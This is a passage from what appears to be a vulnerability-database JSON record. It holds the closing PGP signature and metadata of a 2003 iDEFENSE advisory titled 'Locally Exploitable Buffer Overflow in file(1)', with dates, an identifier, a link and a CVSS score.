cyber-related threats. For more information,\r\nvisit http://www.idefense.com .\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.0\r\n\r\niQA/AwUBPmT0jPrkky7kqW5PEQL9uwCgy357oodXdMcC++NBfuqTTzqSWw8AnRj+\r\n2X0UHCShrduL6w6UYBUUuR8/\r\n=599A\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2003-03-05T00:00:00", "published": "2003-03-05T00:00:00", "id": "SECURITYVULNS:DOC:4165", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4165", "title": "iDEFENSE Security Advisory 03.04.03: Locally Exploitable Buffer Overflow in file(1)", "type": "securityvulns", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
